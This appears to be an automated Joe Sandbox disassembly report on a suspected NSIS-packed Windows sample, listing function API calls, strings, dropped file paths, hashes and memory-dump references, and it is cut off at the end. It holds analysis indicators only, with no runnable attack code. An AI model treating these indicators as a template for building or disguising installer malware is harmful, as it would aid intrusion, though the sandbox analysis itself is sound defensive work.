Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-1820463279
Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 004017B8

Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53

Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5

Strings

Generic, xrefs: 00401770, 00401779, 00401786, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
Heteric, xrefs: 00401818, 00401834
C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00401781
C:\Program Files (x86)\edelweissen\romanblade.ini, xrefs: 00401804, 00401822

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Generic$Heteric
API String ID: 1941528284-1632189751
Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D

Function 00402F38 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402FA3
GetTickCount.KERNEL32 ref: 00403048
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
wsprintfW.USER32 ref: 00403084
WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5

Strings

... %d%%, xrefs: 0040307E
znA, xrefs: 0040300E, 00403020

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$znA
API String ID: 4209647438-2447772013
Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9

Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5

Strings

Frisurens, xrefs: 0040501B, 0040502B, 00405031, 00405054, 00405060

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Frisurens
API String ID: 2531174081-3121014363
Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,76233420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405867
Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
API String ID: 3751793516-2519038138
Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D

Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81

Strings

: Completed, xrefs: 00405C16

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9

Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405A1C
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37

Strings

nsa, xrefs: 00405A0B
C:\Users\user\AppData\Local\Temp\, xrefs: 00405A03, 00405A07

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5

Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99

Function 004054C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
CloseHandle.KERNEL32(?), ref: 004054FA

Strings

Error launching installer, xrefs: 004054DB

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68

Function 004031A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004031CA

Strings

1033, xrefs: 004031D1
C:\Users\user\AppData\Local\Temp\, xrefs: 004031AA, 004031AF, 004031B5, 004031C1, 004031C9, 004031D0

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
